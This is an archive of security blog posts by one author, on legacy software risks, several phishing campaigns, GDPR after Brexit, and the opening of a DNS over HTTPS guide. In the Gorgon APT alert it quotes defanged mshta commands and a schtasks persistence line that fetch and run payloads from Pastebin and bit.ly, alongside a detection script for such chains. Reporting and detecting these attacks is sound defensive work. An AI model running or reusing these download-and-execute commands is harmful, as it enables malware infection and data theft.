Author Archives: Miriam Cihodariu

What Is Legacy Software and a Legacy System in Business + The Risks

If you are leading a business or work within a business, this guide is definitely for you.

You have probably come across the term legacy software or legacy systems but don’t know exactly what they are. Or, even more likely, you are using legacy software or systems without even knowing it.

But there are risks and challenges associated with this (somewhat unavoidable) business practice.

Below I will explain everything there is to know about making the most you can out of legacy software and systems. As I said, it’s highly probable for a business older than a year to be using at least some tools which can be labeled as legacy tier.

First things first, though: let’s start by exploring what legacy software and legacy systems are. Typically, any medium to large company nowadays has at least a few legacy elements in its IT environment.

Next, we’ll move along to tips that can help you identify whether your legacy software or legacy system is one of the risky ones or not.

What Is Legacy Software? Definition(s)

To put it in as few words as possible, legacy software is any piece of software that can’t receive continued patching or support from its developer, or can’t meet the compliance standards in use.

The examples of enterprise-level legacy software can be quite different.

Here are just a few cases which can be labeled as legacy software, to get a better idea of what it can encompass:

  • A major platform with no functional replacement (yet), still supported and compatible with other IT assets, but which does not receive security updates anymore;
  • An older piece of software that is still in use and receives support, but its creators are announcing the transition of support to the newer version of the product (such as the case of Python 2 vs Python 3);
  • A piece of software or platform which still gets updates but only for features (not security patches);
  • A piece of software or platform which still gets security updates and support but is no longer compliant with recent standards;
  • A piece of software or platform which gets updates and support but is not compatible with the newer systems and drivers in use (thus stalling the company’s adoption of those);

In some cases, the category of legacy software can include consumer-oriented software products issued by companies that no longer exist.

But, in spite of the discontinued support – and the discontinued official listing of that software (there’s nowhere to officially buy or download it from) – some users continue to procure it out of nostalgia.

Such is the case of Winamp media player, for example. There are entire Reddit forums dedicated to Winamp nostalgia, along with users still sharing custom made Winamp ‘skins’. There is also newly issued software that can emulate Winamp in-browser. So, the power of nostalgia for legacy software can still make the world go ‘round.

What Is a Legacy System in a Computer Industry Context?

A legacy system is a platform or hub or operating system (something which facilitates digital operations but is one level above software) which is outdated.

Being outdated here can mean that the system can no longer receive support, that it is no longer compatible with other elements of the IT environment, that it is no longer compliant, or that it no longer receives updates.

Myth Busting Legacy Software and Legacy Systems

Here are the most common misconceptions about legacy software and legacy systems.

#1. Legacy software is useless

While legacy software and legacy systems still pose risks (which I’ll dive into below), it doesn’t mean they outlived their usefulness completely.

In many cases, a piece of legacy software or a legacy system is still in use precisely because it is the most comfortable option. Either there is no exact functional replacement yet, or the transition is still too difficult to weather.

Regardless of the exact reason, companies continue to use legacy software precisely because it’s still useful.

Ideally, yes, people should try to move on from legacy software as soon as it’s feasible, but things are always a bit more complicated in practice.

#2. Legacy software is free

The opposite can be true: precisely because legacy software was quite an investment, companies may be reluctant to replace it yet. An investment only makes sense if the cost is recovered over a pre-determined use period.

In many cases, even subscription-based software and systems (which the company is still actively paying for) are in fact legacy ones. The recurrent fee ensures continuous support and perhaps even some feature updates, but the security patches are unsatisfactory, or the software is not compliant.

#3. Legacy software is unsupported

Not always.

As mentioned above and through the examples so far, there are cases when legacy software is still supported by an actual team and you can still get an account manager to troubleshoot stuff for you.

Regardless, no matter how active and involved the support team behind the software is, if it doesn’t get security updates or is non-compliant, it still counts as legacy software.

#4. Legacy software is dangerous

Not always.

I know that most sources you will consult about legacy software will seem to push you to replace it ASAP, on account of it being dangerous.

But the truth is that legacy software is not always dangerous. It depends a great deal on the specifics of the case.

I’ll get into more detail on how to mitigate the risks of legacy software below.

#5. Legacy software and legacy systems should be immediately replaced

Just as legacy software is not always dangerous, so it does not always need to be replaced. It depends on the case and its specifics. Not only of the software but also of the company and its way of operating.

Before you decide whether a particular piece of legacy software needs to get replaced, you should do a case analysis. Applying software updates is a major hassle anyway for company IT admins unless they are already using an automated patching solution. No need to make that job even harder.

The Risks of Running Legacy Software and Systems in Your Business

Still, even if legacy software is not always dangerous, there are cases when it can definitely pose some risks.

Here are a few examples of such risks deriving from legacy software or legacy systems:

  • The risk of falling prey to a data breach or cyber-attack more easily;
  • The risk of slowing down operations due to performance issues or the need to manually fix issues regularly;
  • The risk of becoming non-compliant;

How to Mitigate the Risk of Legacy Software: 3 Ways

In order to avoid these three main types of risk deriving from legacy software or legacy systems, you just need to be proactive about it. Don’t wait until you are already facing a productivity crisis or, worse yet, a security breach.

The main ways to go about it are these:

#1. Consult with security experts about the legacy software elements in your IT environment

As mentioned above, it’s not always dangerous to stick to your legacy software or legacy system already in use. Sometimes the switch can involve costs that are not justified by the amount of risk you need to absorb. So, in some cases, it makes perfect sense to stick with the legacy software (and that’s exactly what some companies do).

Check with security experts to see what software absolutely poses a risk and what legacy software you can afford to continue using. Also, implement an automatic software patching solution in order to close potential security gaps and to make the life of your sys-admins easier.

#2. Do a case-by-case comparison between your legacy software and alternatives

Sometimes, the bad news is that legacy software that really needs to be replaced does not have a viable replacement yet.

But when it does, look into it just as you would look into any other business decision, with pros and cons. When you consider the (explicit) costs of updating, also consider the (implicit) costs of not updating. Is a potential breach easier to come back from than absorbing the costs of a change?

#3. Analyze the impediments to a transition from legacy software to non-legacy software

Also, in each case analysis, consider all the other variables and effort required for a transition. Compatibility and cost concerns are valid, but internal effort and time should not weigh so much in the final decision. Just because it will be a bit of a hassle doesn’t mean you should postpone indefinitely. That’s what gets companies on the breach list in most cases.

This concludes today’s guide on legacy software and legacy systems. If you have any questions or stories to share, feel free to comment below or contact me. I’m here to help if I can.

The post What Is Legacy Software and a Legacy System in Business + The Risks appeared first on Heimdal Security Blog.

SECURITY ALERT: New Credential Stealing Campaign Hits Nordic Countries

People in Nordic countries and beyond should beware: there’s a new credential stealing campaign up and running. For now, it seems to be hitting mostly these countries, but there’s no telling when it will extend to the rest of the world. Where there’s (illicit) money to be made, hackers are restless.

How the New Nordics Credential Stealing Campaign Works

As far as we’ve seen so far, the new Nordics credential-stealing campaign is targeting working emails. The malicious message pretends to be part of a previously agreed upon conversation, since the document is introduced as a link, without much explanation.

This is what a typical email looks like:

Fra: [sender email address] Sendt: 2. oktober 2019 09:56
Emne: Doc
Prioritet: Høj


Finn vedlagte dokument

Vis Dokument ({7ea83df5-6fc6-4c9c-9b65-fb8806b565be}&action=view&

Med vennlig hilsen


[Phone, Email, Company name etc.]

Translated into English, this email would be this:

From: [sender email address]
Posted: October 2, 2019 9:56 AM
Subject: Doc
Priority: High


Find the attached document

View Document ({7ea83df5-6fc6-4c9c-9b65-fb8806b565be}&action=view&wd=tar 7C97f58f57-7285-4f70-8af0-fb5d7d3e3b82% 2FPDF% 20002% 7C4c8df191-241d-4d43-91b6-b3658f3bcdca% 2F% 29)

With best regards


[Phone, Email, Company name etc.]

What happened next, if the user clicked that link?

They are redirected to a picture of a document (it’s not even a real document). The picture has a hyperlink inserted on it, which means that when a user clicks it, they will be redirected to a malicious page.

screenshot of fake document

The fraudulent page then asked users to log in with whatever account they had, whether Yahoo, Office 365, Gmail, etc.

You can watch a slideshow of what happened here (just move your mouse left-right to scroll through the screenshots).

A day later, the Nordics credential stealing campaign took a new form. This time, the malicious document link was this one, instead:{b70a453e-0c44-45f5-8a31-01d022e88a43}&action=view&

In both cases, the malicious portal behind the fake links was

How to Stay Safe from the New Nordics Credential Stealing Campaign

If you have an active Thor Foresight or Thor Premium subscription you are automatically protected from the malicious links above.

But if you’re not – and even if you are – make sure you’re ready for the next round. This campaign or another one like it will be back.

The best way to deal with them is to stay on your guard:

  • Don’t open documents and don’t click any links in emails from people you don’t know;
  • Be proactive about your cybersecurity and have a DNS traffic filter (like Thor Foresight – either for Home or Enterprise);
  • Stay informed about credential stuffing (why criminals might want to steal your credentials) and about phishing in general;
  • If you are part of managing an organization (which means you and your employees will be huge targets for all sorts of phishing attempts), learn about business email compromise (BEC) and about MailSentry™, a cybersecurity solution specially designed to block BEC attacks of any kind.

Stay safe!

The post SECURITY ALERT: New Credential Stealing Campaign Hits Nordic Countries appeared first on Heimdal Security Blog.

Scam Alert: Digi Phishing Campaign Detected, Asking Credentials for a Prize

Summary: we discovered a Digi phishing campaign targeted at Romanian internet users. However, the campaign is displaying tailored content for each country, so its actual target pool is much larger. The malicious domains could be accessed from organic Google search results and led the user to a page with Digi branding elements.

Once there, the users were invited to go through some steps, ‘win’ a prize consisting of a new smartphone and then claim the ‘prize’ by submitting their personal details, including credit card information.

How Does the Digi Phishing Campaign Work?

Incidentally, we found these malicious websites while looking for antivirus-related search terms on Google. It’s pretty ironic, if I think about it, since people who are looking for cybersecurity software could be well enough prepared to recognize a phishing campaign. Of course, I suspect that this is not the only search that could cause these malicious but organic results to be displayed.

malicious organic search results

The malicious links for the Digi phishing campaign only worked if accessed from Google. If we attempted to access them directly, the browser just entered a redirect loop and nothing was loaded.

Once we accessed the website, the page first asked for verification of humanity (the standard ‘Confirm you are not a robot’ checkbox). Oddly, this first screen was displayed in Spanish, although the next ones are in Romanian, based on the correct identification of our location.

digi phishing campaign pic 1

After moving past the human confirmation screen, a page imitating the Digi brand is displayed. The page offers congratulations for being ‘one of the selected 100 users’ eligible to receive a smartphone gift. But before you can receive your gift, you need to answer 9 questions.

digi phishing campaign pic 2

The questions are well crafted so as not to arouse suspicion. All of them were about the devices you use, what other internet and cable providers you have had, that kind of stuff – it can seem like the legitimate competitor research questions a brand can ask its users.

After moving through the questions, you get another confirmation that you answered all of them, that no duplicate IP entries were found and that you are indeed about to get the smartphone reward.

digi phishing campaign page 3

Clicking ‘Next’ will take you to a page displaying the smartphone prize and asking for your email, as well as a confirmation you are over 18.

digi phishing campaign pic 4

After entering your email, you are asked for your credit card details, allowing you to ‘buy’ the smartphone for 4.99 RON, the approximate equivalent of 1 EURO. There’s also a countdown timer on the offer to make you feel the FOMO.

Judging by the bad grammar and spelling on this page, I have a strong hunch that this Digi phishing campaign displays in other languages as well, probably across Europe. 

digi phishing campaign pic 5

These are the malicious URLs we identified as part of this Digi phishing campaign (but they do not work if accessed directly, only if accessed through search results):{browser}&p=599&lpkey=15017060014a220f78&source=AdCash&campaign=173949420&zone=2048991-600419873-0&subzone=Adsterra&uclick=2tdv1ne2bl#

Meanwhile, our own cybersecurity software (the DNS traffic filtering engine in Thor Foresight Home) blocks all of the above.

Context: Another Campaign Which Fakes Digi Branding, but on Social Media

As it happens, another fraudulent campaign using the Digi branding has been identified in the past few days, on social media. There were 5 fake Facebook Digi accounts posing as the official page, even if they were clearly recently created and had very few likes. Link to full story HERE (the text is written in Romanian).

Even more weirdly, one of the pages also ran a sponsored campaign on Facebook, attempting to grow its user pool. The incident is unanimously believed to be a part of a potential electoral fraud campaign, preparing to flood people with fake news in order to influence their votes.

This Digi fake accounts campaign is not so different from the Cambridge Analytica scandal, and it also has some Russian involvement. Some of the ‘o’ characters in these fake Digi pages were not quite right, and a closer look revealed that the input method had been a Russian keyboard, using the Cyrillic equivalent of ‘o’.

Potential of Electoral Fraud?

Such campaigns have a huge potential for electoral fraud and other types of social engineering. While the two types of campaigns discovered could be unconnected, I’m not yet sure it’s all a coincidence.

It’s clear that the objective of the first campaign was to collect credit card details for some type of actual financial theft. It’s also true that Digi is a very well-known brand, so it makes sense for any hacking group to use its image for a campaign.

But at the same time, I am also concerned that the two Digi phishing campaigns are not unrelated and hacking into people’s wallets is just another offshoot of malicious intent. Especially since elections are upcoming and social engineering has already proved its potential for evil, I suspect we will see more in the following months.

How to Stay Safe from Phishing and Social Engineering in General:

We’ve written dedicated guides on how to stay safe from phishing and how to recognize social engineering. Please feel free to browse them and take some precautions from there.

In a nutshell, the most important take-away from the Digi phishing campaign is this: never fail to verify whether a domain you are accessing is the real deal. You can do this by checking its name in the address bar, by closing the tab and going to the official website, or even by contacting the customer service to be found on the official page. If an offer sounds too good to be true, it probably is.

As for social engineering and the potential of election fraud, things can be more complicated. There was huge backlash in both directions after the Cambridge Analytica scandal came to light. People are not comfortable accepting that they can be manipulated easily and that perhaps their ideas are not exactly their own. The only advice for this, beyond checking whether the pages posting stuff on social media are the official ones, is to strengthen your critical thinking as much as possible.

Note: I would like to thank my colleague Eduard Roth who initially drew my attention to this Digi phishing scam.

The post Scam Alert: Digi Phishing Campaign Detected, Asking Credentials for a Prize appeared first on Heimdal Security Blog.

GDPR after Brexit: No Deal and All Other Exit Scenarios Explained

As the British MPs and the EU representatives continue to discuss the specifics of the upcoming Brexit, nothing is yet settled. In this murky context, companies in the UK and companies working with companies in the UK are rightly confused.

What about GDPR, the transnational European data protection regulation to which we were just beginning to adjust?

Will there still be a GDPR after Brexit, for the UK space?

If it will change, how so?

Should a new kind of data protection compliance regulation be created for the UK instead of GDPR?

All these topics are intensely debated right now across all business mediums. Unfortunately, there’s a lot of uncertainty and a lot of Brexit and GDPR myths as well.

Let’s walk through everything together and see what will really happen with GDPR after Brexit on all possible scenarios.

Possible Brexit Scenarios

For now, British politicians are still stuck on debating whether they want to comply with the new law or face a no-deal situation.

There are several possible outcomes, depending on what will be decided on these counts:

  • If they choose to comply with the new law (accept the deal) or not;
  • If they ask for a delay in deciding (Brexit and the deal-or-no-deal debate simply get postponed);
  • If they try to negotiate a new deal;

Regardless of what happens next, the UK and companies connected to this space will still need to deal with GDPR. The GDPR after Brexit issue is not going anywhere.

Even in the most extreme outcomes, data compliance will still be on the agenda. Let’s take a few examples.

A. GDPR after Brexit with a deal

Within the deal currently on the table, GDPR is also stipulated as a must. If the British MPs somehow agree on the deal before the 31st of October deadline, then Brexit goes through as planned. GDPR would be part of the deal with the EU, so the current data compliance regulations stay in place.

In this case, you have nothing to change: GDPR rules stay in place as they are.

B. GDPR if Brexit is delayed and renegotiated

If the British MPs ask for a deadline extension to be able to hopefully gain consensus until then, GDPR essentially remains in place. Until the new deal is discussed and agreed upon, the UK does not technically leave the EU.

That means all European laws and UK-EU agreements stay the same as they were, including the GDPR, at least for the deadline extension.

The political party who initiated Brexit and continues to support it hard says delaying is not an option. But considering that the Parliament can’t seem to reach a consensus on how and when to exit the EU, or even on the idea of exiting at all, a delay is very possible.

C. GDPR after Brexit with no deal (Hard Brexit)

If, let’s say, the UK representatives refuse to comply and accept the deal, this will probably open up a whole can of worms of legal contention.

Until the issues are hashed and rehashed through courts, GDPR will become a big question mark.

One way or another, as the British minister in charge of data protection, Baroness Neville-Rolfe, has recently said, even if GDPR will no longer apply in the UK, some very similar legislation will need to be instated.

“One thing we can say with reasonable confidence is that if any country wishes to share data with EU member states, or for it to handle EU citizens’ data, they will need to be assessed as providing an adequate level of data protection,” Neville-Rolfe said. “This will be a major consideration in the UK’s negotiations going forward.”

While it’s not clear if the UK will still adhere to GDPR after Brexit, or adhere to a similar framework (such as the Privacy Shield, see below), or submit to being independently evaluated,

Useful Info for a GDPR after a No-Deal Brexit:

  • The documents and criteria for the EU’s adequacy decisions (how they decide a country provides adequate data protection and is therefore trustworthy);
  • The Privacy Shield Framework: a framework which allows people to transfer their personal data from the EU to the US while maintaining GDPR standards. There is the possibility for the UK to adhere to it or create a similar framework;
  • The Official GDPR FAQs – on the main GDPR portal.

There are 5 possible scenarios for a GDPR after Brexit with no deal, depending on your role in the data ecosystem.

We’ll tackle each one, but rest assured that the matter of data protection will not return to its pre-GDPR state. Once the world started taking data protection and privacy concerns seriously (and rightly so), there’s no turning back.

Here are the 5 possible scenarios for GDPR after Brexit with no deal:

In all data exchanges, we can speak of data controllers and data processors.

Data controllers are the business entities which collect the data of their clients and contacts (often in order to provide them with services) AND decide the purposes for which that data will be processed.

Data processors are the business entities which process the data on behalf of a data controller (besides any employees of the controller).

Data subjects are the people whose personal data is being processed.

We’ve drawn the 5 possible scenarios for a GDPR after Brexit, depending on the role of the business in the data flow.

  • Scenario 1: Controllers in the UK, providing services for UK people and entities and sharing no personal data with organizations outside the UK;
  • Scenario 2: Controllers in the UK, providing services for the UK but involved with processors in the EU (or anywhere else outside the UK);
  • Scenario 3: Controllers in the UK, providing services for people and business entities in the EU;
  • Scenario 4: Processors in the UK, acting on behalf of controllers or processors in the EU (or UK and EU);
  • Scenario 5: Processors in the UK, acting on behalf of controllers or processors in the UK.

#1. Scenario 1

This scenario is rather simple. Even though there are not a lot of cases like this in real life, since data circulation is never as tightly sealed as this, it has to be covered by any guide.

If you’re among the rare few UK controllers who only provide services to the UK and have no exchanges with non-UK processors, you’re lucky. You don’t really need to concern yourself with GDPR after Brexit.

The data protection laws you will need to abide by after Brexit are going to be more or less the same as the ones you are used to and will be communicated by UK authorities in due time.

It’s highly possible that after the UK leaves the EU with no deal, the controllers doing business solely in the UK will need to comply with the Data Protection Act 2018 (DPA2018) instead of the GDPR. Or, another likely possibility is that GDPR will be absorbed into the UK’s own laws upon Brexit (even with no deal).

In any case, the controllers defined by scenario 1 are the least affected by the GDPR after Brexit issue, because nothing will actually change for them.

#2. Scenario 2

Most small UK businesses fall into this category, of controllers in the UK who are involved with processors outside the EU. Basically, anyone who uses international software like Microsoft, Facebook, Dropbox, and so on, can be fitted into this second scenario.

Legally, nothing really changes in this case either, because GDPR after Brexit will mean adopting the UK data protection law, DPA2018 (linked above). Since the processors outside the UK will still be compliant with GDPR, there is nothing that hinders these UK controllers from continuing to use their services.

#3. Scenario 3

In scenario 3, the UK controllers are not just working with non-UK processors but they are even serving EU-based clients or having EU offices and so on. In this case, the situation is a bit murkier.

The problem is that communicating between various branches and entities involved in the business process might be stalled by GDPR after Brexit.

To be proactive about it, you can designate a DPO (Data Protection Officer) in each country you have offices in, and that should cover the conditions imposed by the EU on third countries (which the UK will effectively become).

This will solve compliance issues, but be warned that handling GDPR after Brexit in paperwork terms might not be the worst of it. Because of the extra hassle involved, it’s very likely that obtaining more clients in the EU market will be difficult. It will be harder to compete with EU controllers who don’t have post-Brexit ambiguity to sort through.

#4. Scenario 4

After May 2018, all processors in the UK who were working with EU organizations were required to have them sign contracts which stipulated how their data would be handled. The issue here is that those contracts and agreements mentioned the UK as an EU country, which will no longer be true.

This means that all this paperwork will need to be redone. It’s best if you are proactive and start sending out the revised forms as soon as the Brexit decision is concluded one way or another.

There is the risk that some of your business partners will decline to re-sign, but you do the best with what you have and move on. Continuing to do business with them in the absence of flawless paperwork is too great of a risk to take.

#5. Scenario 5

For processors in the UK working only with data of people within the UK (and for controllers in the UK), the same applies as in Scenario 1. In other words, nothing changes, there is no extra concern to be had.

Cybersecurity Risks of GDPR after Brexit: A Few Words of Caution

As you can see by now, GDPR after Brexit will bring a lot of paperwork in many cases. Not just paperwork, but also a lot of communications going on with partners across national frontiers.

Since these communications will be anything but routine, with the Brexit situation being new to everyone, they can be a huge opportunity for cybercriminals.

Be wary of any email you receive about Brexit and GDPR matters, especially if the sender is prompting you to do something involving vulnerable data. Don’t enter your login details on any page (could be a phishing attempt), don’t engage in conversations with people you don’t really know from before, etc.

Business Email Compromise (BEC) is a growing and costly threat. The little chaos which will likely flood everyone’s emails concerning GDPR after Brexit is the perfect opportunity for BEC attacks.

Spam filters are not enough to tackle it – you need to do some thorough background checks with every email and to also have an email security solution specially designed to counter BEC attacks.

Wrapping it up

I hope this guide helped clear the confusion surrounding GDPR after Brexit. In any case and however convoluted the Brexit process will continue to be, you should take some steps to prepare for the future.

Just look up your own business situation in the scenarios above and find out what can you expect even if we’ll have a no-deal Brexit. Good luck and drop us a line with any concern you might have.

The post GDPR after Brexit: No Deal and All Other Exit Scenarios Explained appeared first on Heimdal Security Blog.

SECURITY ALERT: Gorgon APT Targets Corporate Emails with Spear Phishing Campaign

The Gorgon APT (Advanced Persistent Threat) is an older but dangerous online threat, first discovered by Unit 42 researchers in February 2018.

The group behind the Gorgon APT came to light while the researchers were still investigating an attacker known as Subaat, when they realized that Subaat was probably part of a larger group targeting governmental organizations.

The History of Attacks by Gorgon APT

Ever since its initial discovery in February 2018, the Gorgon APT has been orchestrating attacks both on government organizations (in the United States, United Kingdom, Russia, Spain, and others) and on corporate targets around the world.

The Gorgon group has often shared infrastructure when performing criminal and nation-state targeted attacks. This made the APT easier to track across these operations.

Within the Gorgon APT infrastructure, the researchers were able to identify several crimeware family samples, including Trojans, RATs like NjRat and info stealers such as LokiBot. These were all hosted on the command and control (C2) domain of the Gorgon group.

Interestingly, the Gorgon APT didn’t just use the traditional C2 strategies we could expect from it. It also used a variety of URL shortening services in order to download its payloads. This made its criminal activity more widespread and potentially more complex to track down, identify and eradicate.

The Current Spear Phishing Campaign by Gorgon APT

While the activities of the Gorgon APT flared on and off from February 2018 until now, the group is now back strongly with a new spear-phishing campaign.

So far, the targets we have intelligence about are located in Europe, but everyone else should be on guard too. It begins with an email containing this text (sanitized for your safety):


Re: Invoice_74521451

Dear Sir

My colleague handling this order is out of office for his vacation.

Please confirm the attached invoice as enabling us to proceed with the payment schedule.

Sri Astuti

As you can see, the bait is the attached Excel document. The XLS file contains VBA macro code: it runs as soon as the recipient opens the document and allows macros to run (Office's "Enable Content" prompt), or immediately if macro execution has been enabled by policy, and from there it delivers the payload.

Just like in its previous attacks, the Gorgon APT then reaches out to Pastebin and downloads and runs obfuscated script code from there (JScript/VBScript inside an HTA, which is what mshta executes).

This is done by spawning a shell with the following commands (sanitized for your safety):

mshta http://bit[.]ly/mydahsgkjshwodakiterikus


"C:\Windows\System32\mshta.exe" http://www.pastebin[.]com/raw/0php6n7G

This leads to several layers of unescape() obfuscation that redirect the chain through a number of other Pastebin addresses (sanitized for your safety):




It also creates a scheduled task that re-downloads and re-runs the payload on a recurring schedule (every 300 minutes, per the /mo switch), which gives the infection persistence across reboots (sanitized for your safety):

"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 300 /tn "DEFENDER Backup" /tr "mshta http:\\pastebin[.]com\raw\3qUvqbpZ"

A total of three script obfuscation methods are used: "StrReverse" (strings stored reversed and flipped back at runtime), "split variables" (strings broken across several variables and concatenated) and "multiple WScript objects".

The payload calls the .NET method System.Reflection.Assembly.LoadWithPartialName (typically from PowerShell) to load assemblies and process the downloaded raw data entirely in memory, so the final stage does not have to be written to disk where a file scanner would see it.

The final payload is a data stealer that communicates with multiple domains, all of which have already been blocked in Heimdal’s Thor Foresight engine.

At the time of writing, the malicious XLS document was detected by only 8 of the 57 antivirus engines listed on VirusTotal. In other words, you cannot rely solely on your antivirus to stay safe.
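The command chain above translates directly into detection logic. What follows is an added example written for this article, not Heimdal code and not anything from the Gorgon group: a handful of rules run over constructed Sysmon-style process-creation events (image, command line, parent image) that flag an Office application spawning a script host, mshta.exe being handed a URL, a scheduled task whose action is a script host, and pastebin/bit.ly staging URLs. The sample events, the rule names and the "[.]" defanging tolerance are assumptions made for the example; the rules are generic to mshta/HTA delivery chains rather than specific to this campaign.

```python
"""Process-creation rules for the mshta / Pastebin / schtasks chain.
Added example, not part of the original alert; events below are constructed."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Parent processes that should never spawn a script host in normal use.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Living-off-the-land script hosts abused in the chain (mshta is ATT&CK T1218.005).
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
# A URL on the command line; tolerates "http:\\host" as seen in the schtasks action.
URL_RE = re.compile(r"https?:[\\/]{2}\S+", re.IGNORECASE)
# Paste sites / shorteners used as payload hosts. "[.]" defanging is accepted so the
# rule can be exercised against sanitised reports as well as live telemetry.
STAGING_RE = re.compile(r"(pastebin(\.|\[\.\])com|bit(\.|\[\.\])ly)", re.IGNORECASE)
# schtasks /create ... /tr "<script host> ..."  (ATT&CK T1053.005)
TASK_RE = re.compile(r"/create\b.*?/tr\s+\"?\s*(mshta|wscript|cscript|powershell|cmd)",
                     re.IGNORECASE | re.DOTALL)


@dataclass
class ProcEvent:
    image: str          # full path of the new process (Sysmon Event ID 1 "Image")
    command_line: str   # its command line
    parent_image: str   # full path of the parent ("ParentImage")


def _exe_name(path: str) -> str:
    """Lower-case file name from a Windows path, surrounding quotes removed."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(ev: ProcEvent) -> List[str]:
    """Return the name of every rule the event trips (empty list = nothing suspicious)."""
    image, parent, cl = _exe_name(ev.image), _exe_name(ev.parent_image), ev.command_line
    hits: List[str] = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawned_script_host")       # macro launching mshta/powershell
    if image == "mshta.exe" and URL_RE.search(cl):
        hits.append("mshta_remote_url")                 # HTA fetched straight from the web
    if image == "schtasks.exe" and TASK_RE.search(cl):
        hits.append("scheduled_task_runs_script_host")  # persistence via schtasks
    if STAGING_RE.search(cl):
        hits.append("paste_site_or_shortener")          # payload staged on pastebin/bit.ly
    return hits


def scan(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map the index of each suspicious event to the rules it tripped."""
    findings: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        hits = evaluate(ev)
        if hits:
            findings[i] = hits
    return findings


# Constructed events: the first two mirror the commands quoted in the article,
# the last two are benign noise a real sensor would also see.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"mshta http://bit[.]ly/mydahsgkjshwodakiterikus",
              r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 300 '
              r'/tn "DEFENDER Backup" /tr "mshta http:\\pastebin[.]com\raw\3qUvqbpZ"',
              r"C:\Windows\System32\mshta.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /sc DAILY /tn "Nightly Backup" /tr "C:\Tools\backup.exe"',
              r"C:\Windows\System32\svchost.exe"),
    ProcEvent(r"C:\Windows\System32\notepad.exe",
              r"notepad.exe C:\Users\ann\notes.txt",
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(hits)}  <- {SAMPLE_EVENTS[idx].command_line}")
```

The first event trips three rules at once (Office parent, mshta with a URL, shortener), the scheduled task trips two, and the legitimate backup task and Notepad launch trip none. In production the same rules map onto Sysmon Event ID 1 or Windows Security event 4688 with command-line auditing enabled; the parent/child rule is the one with the best signal-to-noise ratio, since Excel has no business starting mshta.exe.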

How to Stay Safe from the Gorgon APT and other Spear Phishing Campaigns:

#1. Don’t trust emails from people you don’t know

As far as possible, do not open attachments or click links in emails from unknown contacts. In a professional environment this is rarely practical, but apply it wherever you can.

You can read the email, but do not click links or open attachments until you have established the sender's background. Reach out and ask the sender to remind you how you met or which deal they are referring to.

Ideally, verify the sender's legitimacy through a channel independent of the email thread: pick up the phone and call them on a number you already have, not one taken from the message. If they claim someone introduced you, ask who, and check with that person how well they actually know the sender.

#2. Don’t enter your credentials anywhere without extra checks

If you find yourself on a website or portal that looks like one you trust (Google, Facebook, Outlook, Salesforce, etc.) but which asks you to re-enter your credentials, don't do it. No matter how much it looks like the real thing, it could be the credential-harvesting page of a spear-phishing attempt.

Check and double-check that the address in the browser bar is exactly the one you expect, with no altered or look-alike characters. If you have any doubt, do not enter your credentials; if re-authentication is genuinely required, the mail portal or app you normally use will prompt you for it anyway.

#3. Have an email security solution firmly in place

Run your incoming email through a solution that detects and blocks BEC attacks, so that online crooks cannot fool you or your colleagues. Business Email Compromise (BEC) attacks are a growing threat, and a spam filter or firewall alone is not enough to stop them.

Final word

Last, but not least, stay vigilant. Learn how social engineering works, and how cybercriminals can get into your accounts. Keep learning more about cybersecurity so nothing can catch you by surprise.

If you’re interested, sign up for our Cybersecurity Course for Beginners. It’s completely free and you can learn everything at your own pace. Stay safe!

The post SECURITY ALERT: Gorgon APT Targets Corporate Emails with Spear Phishing Campaign appeared first on Heimdal Security Blog.

Enabling DNS over HTTPS (DoH): Advantages and Best Practices

A new internet protocol is making headlines in enterprise security: DNS over HTTPS (DoH). Although it matters most for businesses and organizations, regular users will be affected as well. Are you ready for it?

Here is what the fuss about DoH is about. If implemented well, the hype is deserved: DoH can make a network's name resolution considerably more private and harder to tamper with.

DNS over HTTPS is still relatively new. The first drafts appeared about two years ago, the standard itself (RFC 8484) was published in October 2018, and the protocol is mostly not deployed yet.

Among browsers, both Google (Chrome) and Mozilla (Firefox) have announced plans to roll out DNS over HTTPS in the near future.

This guide will tell you what this means and how you can implement DNS over HTTPS yourself, the changes to expect and so on.

What Is DNS over HTTPS (DoH) and How Does This Protocol Work?

First thing’s first, let’s clear up the basics. Not everyone understands exactly what DNS is and how it works, let alone the new DNS over HTTPS.

DNS definition:

DNS stands for Domain Name System. It is the distributed directory that maps each domain name to the information computers need in order to reach it; put simply, the DNS is the internet's address book.

People remember domain names easily, but computers route traffic by IP address. That is why the DNS "translates" each domain name into one or more IP addresses and keeps this information together with other records about the domain.

A DNS traffic filtering solution is a crucial security layer for businesses and consumers alike. We have discussed elsewhere why DNS traffic filtering matters and what cybercriminals stand to gain by subverting name resolution.

Now that we defined DNS and DNS filtering, let’s move on to the new buzzword in cybersecurity news: DNS over HTTPS (DoH).

DNS over HTTPS (DoH) definition:

The new standard, published by the IETF as RFC 8484, carries DNS queries and responses inside HTTPS requests (HTTP over TLS, the encrypted form of HTTP).

DNS over HTTPS (abbreviated DoH) is therefore a protocol that sends DNS queries and responses encrypted inside HTTPS connections, instead of in clear text.

DNS over HTTPS vs. plain DNS vs. DNS over TLS

A. Plain DNS vs DNS over HTTPS

Most networks today still use plain DNS: queries and answers travel unencrypted over UDP or TCP port 53 (not over HTTP, as it is sometimes described). Because the communication is sent in plain text, it is readable and forgeable by anyone on the path, which leaves it open to man-in-the-middle attacks unless a traffic filtering solution protects it.

The innovation of the DoH protocol is that the DNS exchange is encrypted with the same TLS layer that protects ordinary HTTPS traffic. This gives a default level of privacy and integrity that plain DNS never offered, since encryption is (or should be) the gold standard.

